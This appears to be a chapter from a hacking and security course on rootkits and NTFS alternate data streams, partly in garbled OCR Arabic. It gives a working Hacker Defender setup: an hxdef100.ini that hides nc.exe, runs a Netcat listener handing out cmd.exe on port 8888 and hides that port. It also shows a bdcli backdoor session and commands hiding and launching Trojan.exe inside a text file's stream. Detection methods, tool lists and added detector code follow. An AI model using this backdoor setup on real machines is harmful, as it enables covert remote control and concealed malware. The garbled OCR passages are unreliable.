rcmd.exe
[Hidden Services]
HackerDefender*
[Hidden RegKeys]
HackerDefender100
LEGACY_HACKERDEFENDER100
HackerDefenderDrv100
LEGACY_HACKERDEFENDERDRV100

Screenshot of the hxdef100.ini configuration file.
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As the example shows, the sections are [Hidden Table], [Hidden Processes], [Root Processes], [Hidden Services], [Hidden RegKeys], [Hidden RegValues], [Startup Run], [Free Space] and [Hidden Ports]. Hacker Defender has more options than these, but they are the ones that matter for installing a backdoor and hiding it. Names in the .ini may use the wildcard "*"; the entry hxdef* therefore covers hxdef100.exe, hxdef100.ini and anything else beginning with hxdef.

[Hidden Table] lists the files and directories to hide. Anything matching an entry disappears from Explorer, from the command-line file listings and from any other file manager on Windows. If you create a folder and add its name to this section, the folder disappears from view together with everything in it. In our example we add "rk", so C:\rk itself becomes invisible.

[Hidden Processes] lists the processes to hide. Every matching process vanishes from the task manager and from any other process viewer, although it is of course still running. Try it: add calc.exe to [Hidden Processes], start the calculator, and it will not be listed even though its window is on the screen. That is the essential trick of a rootkit: the programs are there, but no tool on the system will show them.

[Root Processes] lists the processes that are exempt from the hiding: a root process sees everything, including the hidden files and processes. Add your own shell here so that you can still see and manage the tools you have hidden; for everyone else on the system they remain invisible.

[Hidden Services] is the place for your backdoor if it runs as a Windows service, for example if it is started by the service control manager rather than from a shell; the service is then hidden from the Services console and from the services list of the task manager.

[Hidden RegKeys] hides registry keys, for example the keys under which a service is registered; by default it contains the keys Hacker Defender creates for itself. A hidden key is invisible in the registry editor and to every program that enumerates the registry, which also keeps security tools from finding the service entry. Hiding an entire key is sometimes too much, because a program that expects the key may break if it is told the key does not exist; [Hidden RegValues] therefore hides individual values inside a key instead, for example the one entry in the Run key that starts your backdoor, while the rest of the key stays visible.

[Startup Run] lists programs that Hacker Defender starts at boot. This is where the backdoor goes, for example Netcat started in listener mode.

[Free Space] adds a number of bytes to the free space reported for a drive. If you store a lot of data on the victim, a warez dump or a large collection of tools, the user may notice that free space has vanished; adding the same amount here makes the reported free space look unchanged. The value is in bytes, so 1073741824 adds one gigabyte. Use it with care: a drive that claims more free space than it has is itself a sign that something is wrong.

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[Hidden Ports] hides the ports your backdoor uses from netstat and similar tools. It takes three kinds of entries: "TCPI:" lists inbound TCP ports, for example the port on which your backdoor listens; "TCPO:" lists outbound TCP ports, for connections that the backdoor opens from the victim to your machine; and "UDP:" lists the UDP ports to hide.

With the main sections of the Hacker Defender configuration covered, we can install it. The following example copies Hacker Defender and Netcat into C:\rk and configures hxdef100.ini as follows.





[Hidden Table]
hxdef*
rcmd.exe
rk
nc.exe

[Hidden Processes]
hxdef*
rcmd.exe
nc.exe

[Root Processes]
hxdef*
rcmd.exe

[Hidden Services]
HackerDefender*

[Hidden RegKeys]
HackerDefender100
LEGACY_HACKERDEFENDER100
HackerDefenderDrv100
LEGACY_HACKERDEFENDERDRV100

[Hidden RegValues]

[Startup Run]
c:\rk\nc.exe?-L -p 8888 -e c:\windows\system32\cmd.exe

Newly configured hxdef100.ini file.

We added the folder rk and nc.exe to [Hidden Table], nc.exe to [Hidden Processes], and in [Startup Run] a Netcat listener that is started at boot and hands out cmd.exe on port 8888. The listening port itself is still visible to netstat; to hide it as well, add an entry to [Hidden Ports]:

[Hidden Ports]
TCPI:8888

Below is the folder rk, containing Hacker Defender and Netcat (nc.exe), before the rootkit is started:
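The matching rules of the configuration, as an added example that is not part of Hacker Defender or of the original page: a small C parser for the sections discussed above that applies the "*" wildcard, the [Root Processes] exemption and the [Hidden Ports] lists to a constructed configuration. Comma-separated port lists after TCPI:, TCPO: and UDP:, and case-insensitive matching of names, are assumptions about the format that this example makes, not statements from the page.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_RULES 16
#define MAX_LEN   96

struct section { int n; char rule[MAX_RULES][MAX_LEN]; };

/* The four sections this example models; the others are skipped. */
struct hxdef_cfg {
    struct section hidden_table, hidden_procs, root_procs, hidden_ports;
};

/* Constructed configuration, written the way the walk-through above does. */
static const char SAMPLE_INI[] =
    "[Hidden Table]\nhxdef*\nrcmd.exe\nrk\nnc.exe\n"
    "[Hidden Processes]\nhxdef*\nrcmd.exe\nnc.exe\n"
    "[Root Processes]\nhxdef*\nrcmd.exe\n"
    "[Hidden Services]\nHackerDefender*\n"
    "[Hidden Ports]\nTCPI:8888,9000\nTCPO:\nUDP:\n";

/* Case-insensitive glob: '*' matches any run of characters, '?' one. */
static int glob_match(const char *pat, const char *s) {
    if (*pat == '\0') return *s == '\0';
    if (*pat == '*') {
        for (;; s++) { if (glob_match(pat + 1, s)) return 1; if (!*s) return 0; }
    }
    if (*s && (*pat == '?' ||
               tolower((unsigned char)*pat) == tolower((unsigned char)*s)))
        return glob_match(pat + 1, s + 1);
    return 0;
}

/* Parse the ini text: a [Section] line selects the list that the following
 * non-empty lines are appended to. Unknown sections are ignored. */
static void parse_ini(struct hxdef_cfg *cfg, const char *text) {
    struct section *cur = NULL;
    char line[MAX_LEN];
    memset(cfg, 0, sizeof *cfg);
    while (*text) {
        size_t len = strcspn(text, "\n");
        size_t keep = len < sizeof line - 1 ? len : sizeof line - 1;
        memcpy(line, text, keep); line[keep] = '\0';
        text += len + (text[len] == '\n');
        while (keep && (line[keep-1] == '\r' || line[keep-1] == ' ')) line[--keep] = '\0';
        if (line[0] == '[') {
            if (!strcmp(line, "[Hidden Table]"))          cur = &cfg->hidden_table;
            else if (!strcmp(line, "[Hidden Processes]")) cur = &cfg->hidden_procs;
            else if (!strcmp(line, "[Root Processes]"))   cur = &cfg->root_procs;
            else if (!strcmp(line, "[Hidden Ports]"))     cur = &cfg->hidden_ports;
            else cur = NULL;
        } else if (line[0] && cur && cur->n < MAX_RULES) {
            snprintf(cur->rule[cur->n++], MAX_LEN, "%s", line);
        }
    }
}

static int in_section(const struct section *sec, const char *name) {
    for (int i = 0; i < sec->n; i++) if (glob_match(sec->rule[i], name)) return 1;
    return 0;
}

/* Would the rootkit hide the file or directory `object` from the process
 * `viewer`? Root processes see everything; all others lose the matches. */
static int file_hidden_from(const struct hxdef_cfg *c, const char *viewer, const char *object) {
    return !in_section(&c->root_procs, viewer) && in_section(&c->hidden_table, object);
}

static int process_hidden_from(const struct hxdef_cfg *c, const char *viewer, const char *proc) {
    return !in_section(&c->root_procs, viewer) && in_section(&c->hidden_procs, proc);
}

/* Port rules: "TCPI:8888,9000" hides inbound TCP 8888 and 9000; `proto`
 * is "TCPI", "TCPO" or "UDP". An empty list after the colon hides nothing. */
static int port_hidden(const struct hxdef_cfg *c, const char *proto, int port) {
    size_t plen = strlen(proto);
    for (int i = 0; i < c->hidden_ports.n; i++) {
        const char *r = c->hidden_ports.rule[i];
        if (strncmp(r, proto, plen) != 0 || r[plen] != ':') continue;
        for (const char *p = r + plen + 1; *p; p++) {
            if (atoi(p) == port) return 1;
            if ((p = strchr(p, ',')) == NULL) break;
        }
    }
    return 0;
}

int main(void) {
    struct hxdef_cfg cfg;
    parse_ini(&cfg, SAMPLE_INI);
    printf("explorer.exe sees rk?      %s\n", file_hidden_from(&cfg, "explorer.exe", "rk") ? "no" : "yes");
    printf("rcmd.exe sees rk?          %s\n", file_hidden_from(&cfg, "rcmd.exe", "rk") ? "no" : "yes");
    printf("taskmgr.exe sees nc.exe?   %s\n", process_hidden_from(&cfg, "taskmgr.exe", "nc.exe") ? "no" : "yes");
    printf("netstat sees TCP 8888 in?  %s\n", port_hidden(&cfg, "TCPI", 8888) ? "no" : "yes");
    return 0;
}
```

The root-process exemption is the detail worth noticing: the attacker's own shell (rcmd.exe in the default file) gets the unfiltered view, which is also why a detector that runs as a process not listed there sees exactly what the victim sees and nothing more.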



(Screenshot: Explorer showing the C:\rk folder with the Hacker Defender files and nc.exe.)

Now run hxdef100.exe. The rootkit takes effect immediately: the folder rk and nc.exe are no longer shown by Explorer, the process nc.exe is missing from the task manager, and the listening port is missing from netstat, although the listener keeps accepting connections.
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(Screenshot: the task manager's process list after hxdef100.exe has been run; nc.exe is running but is not listed.)
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(Screenshot: the task manager's CPU usage view on the same system.)

That is how easily Hacker Defender makes files and processes disappear. Rootkits are the point at which a compromise stops being a few suspicious files and becomes a malware rabbit hole: once the operating system itself filters what you see, no tool that runs on that system can be fully trusted, and the detection and defence measures in the following sections become necessary.



Hacker Defender (hxdef) is a rootkit for Microsoft Windows operating systems.

It enables processes, files, and registry keys to be hidden from system administrators and security scanning tools.

It can enable remote control of a computer without opening a new TCP or UDP port, via a covert channel: the backdoor client bdcli100.exe connects to a port that is already open on the victim (TCP 135 below), sends the rootkit's password, and is handed a command shell by the hooked service.

Command Prompt:

bdcli100.exe 192.168.3.93 135 V4L
connecting server...
receiving banner...
opening backdoor...
backdoor found
checking backdoor...
backdoor ready
authorization sent, waiting for reply
authorization - successful
backdoor activated!
close shell and all progz to end session
session 



i 



Detecting Rootkits

Rootkit detection techniques fall into five groups: signature-based, heuristic, integrity-based and cross-view-based detection, and Runtime Execution Path Profiling.

Signature-based Detection

Signature-based detection works the way a classic anti-virus does: it compares the bytes of the files on the system with a database of fingerprints of known rootkits, looking for the characteristic byte sequences of each malware program. It only finds rootkits that are already known, and it has an obvious weakness against rootkits in particular: a rootkit that is already active in the kernel can hide its files from the scanner, so the scanner never gets to compare them. Signature scanning is therefore most reliable when run from a clean boot medium.

Heuristic Detection

Heuristic detection looks for deviations from the normal patterns and behaviour of the operating system rather than for known code, which is why it is also called behavioural detection. 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It can find previously unseen rootkits, for example by noticing that an execution path inside the operating system is being diverted (path hooking), but the price is false positives, because legitimate security software uses many of the same techniques.

Integrity-based Detection

Integrity-based detection compares the current state of the file system, the boot record, or the contents of memory with a trusted snapshot (the base-line) taken earlier. Any change to a file, sector or memory region that should not have changed is reported; the method needs a baseline that was recorded while the system was known to be clean.

Cross-view-based Detection

Cross-view-based detection enumerates the system's files, processes and registry keys in two ways: once through the standard operating system APIs, and once by a low-level method that bypasses those APIs, for example by reading the raw disk structures or the kernel's own memory. The two views are then compared. Anything present in the low-level view but missing from the API view is being hidden, whether by API hooking or by DKOM, so this method catches hook manipulation and DKOM rootkits alike.

Runtime Execution Path Profiling

Runtime Execution Path Profiling records the execution path of system calls, for example the number of instructions executed, and compares it with the profile of a clean system. A call that has been hooked takes a different path than it should, and the change in its profile reveals the rootkit.
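How a DKOM unlink hides a process, and how the cross-view detection just described finds it anyway, as an added C example that is not from the page or from any real rootkit or scanner: the process objects, the list head and the PID table are simplified stand-ins for the kernel's structures, and the PIDs and image names are constructed. It serves both the DKOM section above (the unlinking in the figure) and the cross-view method.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Kernel-style doubly linked list node (the LIST_ENTRY of the figure). */
struct list_entry { struct list_entry *flink, *blink; };

/* Minimal stand-in for the kernel's process object: unique PID, image
 * name and the ActiveProcessLinks entry that chains it to the others. */
struct eprocess {
    uint32_t pid;
    const char *name;
    struct list_entry links;
};

#define NPROC 6
/* Constructed process set. The kernel also reaches processes through a
 * PID-indexed table (here simply this array), which list surgery never touches. */
static struct eprocess procs[NPROC] = {
    { 4, "System" }, { 236, "smss.exe" }, { 336, "csrss.exe" },
    { 432, "winlogon.exe" }, { 1200, "nc.exe" }, { 1460, "taskmgr.exe" } };
static struct list_entry head;   /* the list head, like PsActiveProcessHead */

static struct eprocess *from_links(struct list_entry *e) {
    return (struct eprocess *)((char *)e - offsetof(struct eprocess, links));
}

/* Link every process into the circular list, as the kernel does on creation. */
static void build_list(void) {
    head.flink = head.blink = &head;
    for (int i = 0; i < NPROC; i++) {
        struct list_entry *e = &procs[i].links;
        e->blink = head.blink; e->flink = &head;
        head.blink->flink = e; head.blink = e;
    }
}

/* DKOM: unlink one process. It stays in the PID table and keeps being
 * scheduled (the scheduler runs threads, not this list); only list-based
 * enumeration loses it. Returns 1 if the PID was found and unlinked. */
static int dkom_hide(uint32_t pid) {
    for (struct list_entry *e = head.flink; e != &head; e = e->flink) {
        if (from_links(e)->pid != pid) continue;
        e->blink->flink = e->flink;
        e->flink->blink = e->blink;
        e->flink = e->blink = e;   /* self-linked, so removal at exit stays harmless */
        return 1;
    }
    return 0;
}

/* High-level view: what Task Manager gets through the API (a list walk). */
static int api_view(uint32_t out[], int max) {
    int n = 0;
    for (struct list_entry *e = head.flink; e != &head && n < max; e = e->flink)
        out[n++] = from_links(e)->pid;
    return n;
}

/* Low-level view: scan the PID table directly, which is what a detector
 * does by reading kernel memory or by probing every possible PID. */
static int raw_view(uint32_t out[], int max) {
    int n = 0;
    for (int i = 0; i < NPROC && n < max; i++) out[n++] = procs[i].pid;
    return n;
}

/* Cross-view detection: a PID present in the raw view but absent from the
 * API view is being hidden. Returns the count and fills hidden[]. */
static int cross_view(uint32_t hidden[], int max) {
    uint32_t api[NPROC], raw[NPROC];
    int na = api_view(api, NPROC), nr = raw_view(raw, NPROC), nh = 0;
    for (int i = 0; i < nr; i++) {
        int seen = 0;
        for (int j = 0; j < na; j++) if (raw[i] == api[j]) seen = 1;
        if (!seen && nh < max) hidden[nh++] = raw[i];
    }
    return nh;
}

int main(void) {
    uint32_t hidden[NPROC];
    build_list();
    printf("hidden before DKOM: %d\n", cross_view(hidden, NPROC));
    dkom_hide(1200);                            /* hide the backdoor process */
    int n = cross_view(hidden, NPROC);
    for (int i = 0; i < n; i++) printf("hidden process found: pid %u\n", (unsigned)hidden[i]);
    return 0;
}
```

On a real system the raw view is the expensive part: it means reading the PID table or kernel memory with a driver, or brute-forcing OpenProcess on every PID, precisely because the convenient API is the thing the rootkit controls.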

Steps for Detecting Rootkits

The method below is documented by Microsoft Research at http://research.microsoft.com/

1. On the suspect system, list all hidden and all non-hidden files and save both listings:

dir /s /b /ah
dir /s /b /a-h

2. Boot the same machine from a clean CD, so that the operating system on the disk, and with it any rootkit, is not running, and take the same two listings again:

dir /s /b /ah
dir /s /b /a-h

3. Compare the two sets of listings with WinDiff. Files that appear in the clean-boot listing but not in the listing taken on the running system are being hidden by the rootkit.

Note: this technique does not detect stealth software that hides somewhere other than in the file system, for example in the BIOS, in a video card's EEPROM, in bad disk sectors, or in alternate data streams.
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Defending Against Rootkits

The only certain way to get rid of a rootkit is to reinstall the operating system and the applications from trusted media, after backing up the critical data. Once a rootkit has been in the kernel, nothing the compromised system reports about itself can be trusted, so cleaning it in place is a gamble; reinstallation is the first line of defence and the safest recovery.

Use the least privilege necessary. Most rootkits need administrator rights to install, so do not work as administrator during everyday tasks; use an ordinary account and switch to the privileged one only when needed, with "su" on UNIX or "run as administrator" on Windows.

Keep a well-documented, automated installation procedure so that a compromised machine can be rebuilt quickly and identically, and keep the installation media and the backups of critical data offline.

Harden the workstations and servers against attack: close unneeded services, restrict who can reach the administrative interfaces, and filter the network so that an attacker who is on the network cannot log in to the servers in the first place.

Check for backdoors and rootkits with dedicated tools, and complement them with your own integrity checks: record the checksums of all critical binaries (with md5sum, sha1sum or their Windows equivalents) on a clean system, keep the list on read-only or offline media, and compare against it regularly. A changed system binary, or a shell script or binary that appears where none should be, is a sign of a rootkit. Do the checks from a clean boot when possible, because a running rootkit can falsify what the local tools read.

In summary:
- Install the operating system and applications from trusted media and keep them patched.
- Keep anti-virus and rootkit-detection software up to date.
- Run as an unprivileged user wherever possible.
- Verify the integrity of system files and of the boot record against a known-good baseline.
- Use rootkit detection tools such as RootkitRevealer, VICE and F-Secure's BlackLight, which detect hidden files, processes and registry keys.

https://www.facebook.com/tibea2004



Anti-Rootkit: Stinger

http://www.mcafee.com/us

McAfee Stinger is a stand-alone utility that detects and removes specific viruses, trojans and rootkits from an infected system. It is not a replacement for full anti-virus software but a targeted cleanup tool: it includes rootkit scanning and the cleaning of malicious processes, and it can be run on a system whose regular protection has already been subverted.

(Screenshot: the Stinger window with its scan options and the list of threats it detects.)



Anti-Rootkit: UnHackMe

http://www.greatis.com

UnHackMe is an anti-rootkit program that helps you detect and remove rootkits together with the trojans, worms and viruses that travel with them. It is built around the fact that a rootkit on Windows can hide from ordinary scanners: its Reanimator component double-checks the Windows system for hidden processes, services and files, and it is meant to run next to, not instead of, a normal anti-virus program. It detects and removes malicious code (rootkits, trojans, worms, viruses and so on) without noticeably slowing the machine.

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Features:
- Precise double-checking for a Windows-based PC
- Instant tracking of malicious code in the system (rootkits, Trojans, worms, viruses and so on)
- Does not slow up the PC and it is compatible with antivirus programs

(Screenshot: the UnHackMe scan results window listing detected items with their file paths.)

Anti-Rootkit: Other Tools

The following rootkit detection tools also help you find and remove rootkits, viruses and other hidden malware:

Virus Removal Tool available at http://www.sophos.com
Hypersight Rootkit Detector available at http://northsecuritylabs.blogspot.com/
Avira Free Antivirus Tool available at http://www.avira.com
SanityCheck available at http://www.resplendence.com
GMER available at http://www.gmer.net
Rootkit Buster available at http://downloadcenter.trendmicro.com
Rootkit Razor available at http://www.tizersecure.com
RemoveAny available at http://www.free-anti-spy.com
TDSSKiller available at http://support.kaspersky.com
Prevx available at http://www.prevx.com

iTFS Data 



CjUUJI djllaii ^ jjjjI Jo s^lc <j jl^j NTFS ^ L 6 (File attribute)*—*!^ cjLujj ^iLjaVU 

e yr^' (i^ j c (security descriptor)u^VI j oj <*j^ J jVl <^AjIjJI jaj .(Data Stream) 
SjjSioll cjUUII ^> >l ^jj ^ (Alternate Data Stream [ADSP ci^ .cjliLJ! J^b diUUJ! 

ADS J Alternate Data Stream ^ U NTFS ^ULJI ^ 
<jjou]U Transparent cJ^^ -^j^^ I^a ^jj ci (jjj^ c kL> ^ djUi jlx-^ iajj ^1 jJI (j^asu 5^1^ 3 K > f >i ^ ^-W- ADS ^Uijj 

Cilia jjj^UJl J JjUui J^i-« J 1^1) t< l ^jj djj^ (jfc j±£)udJ ^aLkJl HFS f^ 1 ^^ dlliLJ! ^aUaj jjAlijll ^1 jj] U^ajl I^I^JjujI ^aJJ 

J) o^*-* 2^^^ ^ c al^li iajjl Uiajl j tSiflUlt cJ^j j t al^ll jjj^jl ^ jii^Lo J ^^kiaaj j Resource Forks ^ 

J^j .(stream) ls ^ djliaii ^.jj qu^L^VI Stream c> c> ^> NTFS J ^^^^ u' ^ ^ 

: JU3I J£ai3! J U£ .Stream -Jl ^ ( '^^ j^ o-^^ 1 ^! i> Stream 
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FOO.TXT 




b (aSjLJI J£ai3! J L£ null) ^ uj^ uj^ ^Jal jjaVI Stream -SI j ^ ^jj Stream -SS 

. ":" jjilaij axjj t^LJI axj Stream -St ^ <j^J] ^ ls j^' Stream ^I^IujV 

:Jli. 

D:\test.txt => Default Stream here 
D:\test.txt:OPS => Stream called OPS 

aj^iaj q] (jl^j V ^n^j U c_aL (jxuia U jlx^ ^ILkl ^fi^ ^^S^j ^ ^-al*3 Streams -SI lP 3 ^ ^ Explorer jj^jSI ^ ^xiui* 

D:\> echo mypasword > passwords.txtremail 

(j^jja o^lLkl U jt&ia] ^ l>Sj j^l Stream -SI ^ bVun l passwords.txt ^1^31 ^ ^5 lil UJa 

. emails UULijl ^Istream 

D:\> more < passwords.txt:email 
mypasword 

J^b/^i Ci^uS jSI j c_flL3! 1$jj£ jj cr^l ^-Ml t> £jh g?l > (Alternate Data Stream [ADSP %lJI cjULJI 
JSI cjUUJI jto ^Ui Jlc iSj^. u^jjU lS^? o-^UJI (Master File Table) Jl ^a*SI J j^ .NTFS ^ 
tilSi j <j <L^al<i ^ j a aUSi J ^iiuuS (ADS) ^^Sl ^^Sl ci^ <^^S ,( jS>^SI oajsSI cJ*^! j " q S^l U^jl^ 

g^lj Jj^jS! J (Alternate Data Stream [ADSD ^AjIuJI .<^t Jj^ i> 

.djULJI ^ Jj^iSI jj J j^a jSI dAiUjj tcJ^JI ^jujI 4l1jIaK3I ^(Attribute)^-^^! <-S^ ^^1^13 A-iL^a jSI dAiUJ! 
^ ojUjcI (j^j ^.ijiii c kL> l\l c — ^ 6<jU^JI (jj 3 o^ 3 *^ J 4 c aL&li <!L^. ^iiiS ADS S^IiLujVI ^li* 

_CjliLJ! a!Lo StaV l^jJajc jl tl g tl^ijUaj jl jjiisu (jj^ ^<Jl CjlilxJl Jl CjULiJ! (jj^J Jc oj^L<Jl ADS 

l^iUiu£l ^jj Uiiiii ^iJ ^l^uaSI j (jjii^SI ^IkiSI iL^al jiSI CjI j^l jl rootkits u^-U-^S ^ ADSs 

^ij^aj CjUjaj ^l^klujU Igic c qui^Sl ^aJJ ^jl JjVim^l ^ ADS ^ ^^iS^Jl .^aUaiSl J JJJ^ (J^ 

jla t^^aVI t^LJI ADS -^j/ti^ jj .(Windows Explorer) jj^jSI jl (Command Line) 

j& c aL&Si jjiisu <jl jaxj ^iSI ^i^. jSI jJj^JI .ADS anyfile.exe J^SI -S 3 ^ c * q S^Sl Jj^aVI ^>^>SI j^-iaj ^ jjuj c aLxli 

s j^ 3 uj^ 5 cjl c^SI '(TimeStamp)^ jSI <yLkSI Jjaxj 




[Figure: "Inject malicious code in the existing file"; labels: Hacker, Existing File, NTFS File System] 
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c:\>notepad myfile.txt :lion.txt 
c:\>notepad myfile.txt rtiger.txt 



?NTFS Stream ^ 
■ m U\^\ cjI jkkl! ^Uj) J^U ^> cillij NTFS Stream ^1 

.cjUUJ! jkJ 10 



<j| l_s jjuj myfile.txt c aL&li AjjjI 

.Notepad ^ [myfile.txtrtiger.txt] <-ikll g2i &* Stream cfe^U 

Notepad is a stream-compliant application. 




Launch c:\>notepad myfile.txt:lion.txt 
Click 'Yes' to create the new file and type 10 lines of data; save the file. 

To modify the stream data, open the document 'myfile.txt:tiger.txt' in Notepad. 

Launch c:\>notepad myfile.txt:tiger.txt 
Click 'Yes' to create the new file and type another 20 lines of text; save the file. 

View the file size of myfile.txt (it should be zero). 




NTFS Stream Manipulation (Hiding Trojan in NTFS Stream) 

: $jtfjt Ci\ jkaJI jjilS jjjla <jc NTFS Stream 

:(Stream) README.TXT J\ Trojan.exe ^t>i^ c^l - 
c:\>type c:\Trojan.exe > c:\Readme.txt:Trojan.exe 

:(Stream) README.TXT Trojan.exe i-iLJI - 

c:\>start c:\Readme.txt:Trojan.exe 

:(Stream) README.TXT 6- Trojan.exe ^J±* E l >3«V - 
c:\>cat c:\Readme.txt:Trojan.exe > Trojan.exe 

. [Cat is a Windows 2003 Resource Kit Utility] i-Uajal* 



[Figure: Trojan.exe (size: 2 MB) at location c:\; move the contents of Trojan.exe into Readme.txt; Readme.txt at location c:\] 
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Hiding Files Using NTFS Streams 
:<LlUll cjljJaaJI jjIS calc.exe CA^J NTFS Stream ^IxuiIjj U * till jjjj LLSI <j*ajij 

C:\windows\system32 jLuwJI ^ calc.exe <-al*JI ^jSj ^3 C:\ o^jW^ magic cr*^ -1 

.C:\magic ^> J 1 

4^Lk> ^ tsUi axj ^ <C:\magic ^V*^ f t>j Command Prompt j*ljVl ^iL ^ jl> -2 

.Enter <ija ^ jJjVl ^ notepad readme.txt jJa*JI 
.L_aLJI ii^j jlc. <ua Hello world j^Ji ^ j£> notepad ^i^SJI jj ^ ^ -3 



C:\magic>notepad readme.txt 

[Screenshot: readme.txt open in Notepad containing the text "Hello world!"] 



.Command Prompt j*ljVl dir jla^JI <^LL t> readme.txt ^ -4 

.cmd j^ijVl y-i y-MI ji^JI A^Uia J^U <> ^ij readme.txt calc.exe -5 

C:\>type c:\magic\calc.exe > c:\magic\readme.txt:calc.exe 



[Screenshot: C:\magic>notepad readme.txt, then C:\magic>dir; the listing of C:\magic shows calc.exe (188,416 bytes) and readme.txt (12 bytes), 2 File(s) 188,428 bytes] 



. ^3 Igjt readme.txt t * a ^^ s^j^aJI 3aLuiaI1 a Uoi jU, |a& J laJLml asu -6 
.readme.txt t ^^^k (3^-^ jjajuJI J^Lk ^ U^ii dia aA\ a^l*. ^ a*j ^3 UjV calc.exe t dlj£ *j ^jVI -7 

.readme.txt calc.exe J*jj lU*3 ^llij ^JUll jkJl 4^Lk> ^ jVl -8 

C:\magic>mklink backdoor.exe readme.txt:calc.exe 

.Enter J> j& ^ " 9 

.<jjojUJI J^-*^ <^ * j*^^ backdoor <cUSa -10 
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05 : 39 An 

= ^ l fin 

MS DM 

2 Dir<s> 



<D1 B> 

18 8 , -418 calc . c 

±2 readiw -twt 
188, 42 S Jb v t e s 
4,377,697,824 >> v t e s. frt< 



-inf ~r 



; ><*±ir- 

in d *- e C 1-ihbls no l^lbel, 

Kunher d_s 3*4C*? — D78F 



Directory oF CiSfugic 

W^12^2012 05 =39 AM 
»^12/2ai2 BG:39 An 
ll^l^^ Id felt* HfeiSl An 
*9^12/2B12 BS:44 AM 

2 Fx lc<s> 
2 Wir<s> 



<MB> 

L8S,41b calc .exe 

188,-128 bytes 
4,377,415,&88 bv^es F^e=< 



C:\mrtgir >nkl ink readme .txt :calc .exe 

:. yiri puj i 34: i ink i: rtttrtl I u r kUuur < <^ ™ ™ ■ ™ -> > re adne . txt : calc 




I - I I 



Ntfs Stream Detector: StreamArmor 

http://securityxploded.com 

j&j UUj ^-aUJl ^Uajlt <> jjj La all (ADS) J^H CMjjII Jiti ^ t LSSll ^ cil^LoiJ sbVl 

sUauJI Streams l£ u& ^£11 j <i^L ^U=u3! ^ jj£i*3! ^-^^ill ^ cil^l^j dii^ Multithreaded ADS scanner 
ia-aj ^ l_Luu£I (ji*^ Stream lP 3 ^*^ 4-pl*lt cjUUJI ^ jj.ui.a11 cjUUJI l-aLul&I jg > >n aj .c*L ^aL=JI ^U=ull 
.Advance File type detection mechanismM ^l^i^U < — ai^Al Streams Cf- L.L2S1I ^ j^IS -ol L£ . jjl 
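Scanning for alternate data streams, as the StreamArmor description above discusses, can also be done from the command line: `dir /r` lists every named stream on a volume. The following is an added example (not code from the page or from any of the tools it lists) that parses a constructed `dir /r` listing and flags streams that carry unexpected data, which is how the calc.exe-in-readme.txt trick from the earlier walkthrough would be caught. The sample listing, its dates and the setup.zip entry are constructed for the example; the Zone.Identifier stream name is a real stream Windows writes to downloaded files.

```python
"""Added example: flag alternate data streams (ADS) in `dir /r` output."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample of `dir /r` output (the /r switch makes dir list
# alternate data streams). File names follow the page's C:\magic
# walkthrough; the dates, sizes and the setup.zip entry are made up.
SAMPLE_DIR_R = """\
 Volume in drive C has no label.
 Volume Serial Number is 34C9-D78F

 Directory of C:\\magic

09/12/2012  05:39 AM    <DIR>          .
09/12/2012  05:39 AM    <DIR>          ..
09/12/2012  05:39 AM           188,416 calc.exe
09/12/2012  05:44 AM                12 readme.txt
                               188,416 readme.txt:calc.exe:$DATA
09/12/2012  05:50 AM             4,096 setup.zip
                                    26 setup.zip:Zone.Identifier:$DATA
               3 File(s)        192,524 bytes
               2 Dir(s)  4,377,415,688 bytes free
"""

# A stream line carries only a size and "file:stream:$DATA"; the primary
# (unnamed) stream is never listed this way, so any match is a named stream.
STREAM_LINE = re.compile(r"^\s*([\d,]+)\s+(.+?):([^:]+):\$DATA\s*$")

# Streams Windows itself writes; Zone.Identifier marks downloaded files.
BENIGN_STREAMS = {"Zone.Identifier"}
EXEC_SUFFIXES = (".exe", ".dll", ".scr", ".com", ".bat", ".cmd", ".ps1")


@dataclass
class StreamFinding:
    file: str
    stream: str
    size: int
    suspicious: bool
    reason: str


def parse_dir_r(output: str) -> list[StreamFinding]:
    """Return one finding per named stream in the listing."""
    findings: list[StreamFinding] = []
    for line in output.splitlines():
        m = STREAM_LINE.match(line)
        if not m:
            continue
        size = int(m.group(1).replace(",", ""))
        file, stream = m.group(2), m.group(3)
        if stream in BENIGN_STREAMS:
            findings.append(StreamFinding(file, stream, size, False,
                                          "well-known Windows stream"))
        elif stream.lower().endswith(EXEC_SUFFIXES):
            findings.append(StreamFinding(file, stream, size, True,
                                          "executable content in a named stream"))
        else:
            findings.append(StreamFinding(file, stream, size, True,
                                          "unexpected named stream"))
    return findings


def suspicious_streams(output: str) -> list[tuple[str, str, int]]:
    """(file, stream, size) for every stream worth a closer look."""
    return [(f.file, f.stream, f.size) for f in parse_dir_r(output) if f.suspicious]


if __name__ == "__main__":
    for f in parse_dir_r(SAMPLE_DIR_R):
        flag = "SUSPICIOUS" if f.suspicious else "ok"
        print(f"{flag:10} {f.file}:{f.stream} ({f.size} bytes) - {f.reason}")
```

Note that readme.txt itself reports 12 bytes while its calc.exe stream holds 188,416 bytes; the size a normal directory listing shows says nothing about what the named streams contain, which is why a stream-aware listing (or one of the dedicated tools) is needed.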
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NTFS Stream Detector: Other Tools 

t flju&ll CjIj^I <a jjni^l cjlSa^jll jo l_l^3I b&S <Lj .^jjjoJI J 3^.12*11 NTFS Stream * cjIj^I ^ ^ja»JI c*1Ua 

NTFS Stream 

ADS Spy available at http://www.merijn.nu 

ADS Manager available at http://dmitrybrant.com 

Streams available at http://technet.microsoft.com 

Alternatestreamview available at http://www.nirsoft.net 

NTFS -Streams: ADS manipulation tool available at http://sourceforge.net 

Stream Explorer available at http://www.rekenwonder.com 

ADS Scanner available at http://www.pointstone.com 

RKDetector available at http://www.rkdetector.com 

GMER available at http://www.gmer.net 

Hijack This available at http://free.antivirus.com 



STEGANOGRAPHY 



CjLg J*-* jl 4_juj jaLz e-Ujail Clljl£ f.\ jjoj 6 jjliJl CjI^IIaaJ duaJl 4_jaiij <J jjoiJ ^ (J^asu tgUlmj <JjLuj jll jl JjJaJl ^^Jfc 6jJj£ 

tAjjoi^Jl CjI^ILoaII (J^-I^aj c3Jj ^-^J^ t — J*^l <-<u3 duljj 44jjLg jlx-<Jl jj^xj ^.auij Lg jl l— LjAaJl jj^aJl J j .4-iJjjaiLaJl S^_^.VI 

^^jll (JjLuo jll j t^xiUi J l^jt >>i jj I^IiLqj V (j-ac- diL* jl*-<JI ^likl (j^j Jll <JjLui j^I <J-^ J i_ laoll Jl La li& j 

